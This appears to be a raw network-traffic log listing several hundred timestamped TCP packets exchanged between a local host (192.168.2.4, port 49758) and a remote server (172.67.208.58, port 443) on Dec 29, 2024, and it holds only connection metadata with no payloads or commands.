Dec 29, 2024 17:56:12.683249950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.683263063 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.683310032 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.683319092 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.683336020 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.683357000 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.712183952 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.875148058 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.875174046 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.875242949 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.875257015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.875391960 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.878266096 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.878281116 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.878340006 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.878345966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.878381968 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.880800009 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.880812883 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.880871058 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.880876064 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.880916119 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.883356094 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.883369923 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.883505106 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.883516073 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.883563995 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.888295889 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.900366068 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.900379896 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.900420904 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.900429010 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.900466919 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.902488947 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.902503014 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.902565956 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.902571917 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.902616978 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.905082941 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.905095100 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.905136108 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.905142069 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.905184031 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.905194998 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.908143044 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.908190012 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.908195972 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.908210039 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:12.908237934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.908257961 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:12.995234966 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.085726976 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.085747004 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.085772038 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.085783005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.085825920 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.085844994 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.088767052 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.088800907 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.088814020 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.088820934 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.088875055 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.091269970 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.091289997 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.091332912 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.091340065 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.091363907 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.091381073 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.091449022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.093852043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.093866110 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.093898058 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.093904018 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.093939066 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.099060059 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.101598024 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.111057043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.111076117 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.111113071 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.111119032 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.111151934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.111166000 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.112833977 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.112848043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.112881899 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.112921000 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.112926006 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.112961054 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.115999937 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.116017103 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.116060972 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.116069078 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.116111040 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.117419958 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.118529081 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.118592024 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.118788958 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.118841887 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.139208078 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.297223091 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.297239065 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.297323942 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.297333002 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.297555923 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.299690962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.299705982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.299770117 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.299777031 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.299813986 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.302191973 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.302207947 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.302263975 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.302270889 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.302308083 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.305345058 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.305361032 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.305413008 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.305422068 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.305460930 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.321892023 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.321912050 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.322000027 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.322011948 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.322177887 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.323546886 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.323561907 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.323621035 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.323626041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.323663950 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.326742887 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.326757908 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.326817036 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.326823950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.326863050 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.329267979 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.329282045 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.329338074 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.329344988 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.329387903 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.507695913 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.507714987 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.507780075 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.507796049 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.507836103 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.510135889 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.510164976 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.510205030 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.510210991 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.510242939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.510256052 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.512722969 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.512737989 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.512797117 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.512804031 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.512842894 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.515832901 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.515847921 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.515929937 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.515938997 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.515990973 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.532274008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.532290936 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.532371044 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.532381058 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.532419920 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.534466028 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.534481049 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.534543037 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.534548044 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.534586906 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.536922932 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.536936998 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.536998034 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.537004948 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.537044048 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.540112019 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.540127993 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.540189981 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.540196896 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.540237904 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.718317986 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.718333960 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.718429089 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.718439102 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.718483925 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.720803022 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.720818043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.720875978 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.720881939 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.720921040 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.723298073 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.723315954 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.723366022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.723373890 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.723407984 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.726392031 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.726408958 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.726485968 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.726494074 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.726526022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.743185043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.743206978 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.743323088 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.743333101 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.743371964 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.745177984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.745192051 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.745270014 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.745277882 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.745335102 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.747699976 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.747716904 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.747769117 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.747777939 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.747805119 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.747817993 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.750951052 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.750966072 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.751065969 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.751079082 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.751132965 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.929039955 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.929055929 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.929148912 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.929160118 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.929199934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.931324005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.931339979 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.931406975 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.931412935 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.931447029 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.934441090 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.934456110 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.934514046 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.934520006 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.934561014 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.936892986 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.936908960 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.936969995 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.936975956 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.937021971 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.953938961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.953959942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.954045057 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.954066992 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.954212904 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.955842972 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.955857038 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.955900908 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.955908060 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.955936909 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.955949068 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.958995104 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.959008932 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.959065914 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.959073067 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.959112883 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.961535931 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.961549997 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.961576939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.961615086 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:13.961623907 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:13.961662054 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.139689922 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.139707088 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.139832020 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.139842033 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.139955044 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.141957045 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.141971111 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.142026901 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.142033100 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.142065048 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.142081022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.145092010 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.145107985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.145167112 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.145173073 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.145210981 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.147567987 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.147583008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.147644997 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.147650957 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.147692919 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.165250063 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.165271044 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.165405035 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.165422916 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.165467978 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.167162895 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.167181015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.167217016 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.167222023 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.167253017 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.167275906 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.169711113 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.169724941 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.169773102 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.169780970 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.169816971 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.172864914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.172897100 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.172949076 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.172955990 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.172977924 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.172986031 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.350478888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.350500107 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.350543022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.350554943 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.350579977 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.350595951 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.352869987 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.352884054 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.352941990 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.352948904 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.352992058 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.355413914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.355427980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.355484962 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.355492115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.355531931 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.358588934 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.358603954 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.358660936 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.358669996 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.358707905 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.376122952 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.376142979 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.376317024 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.376333952 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.376382113 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.377674103 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.377688885 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.377752066 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.377758980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.377791882 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.380815983 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.380831003 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.380891085 CET	49758	443	192.168.2.4	172.67.208.58
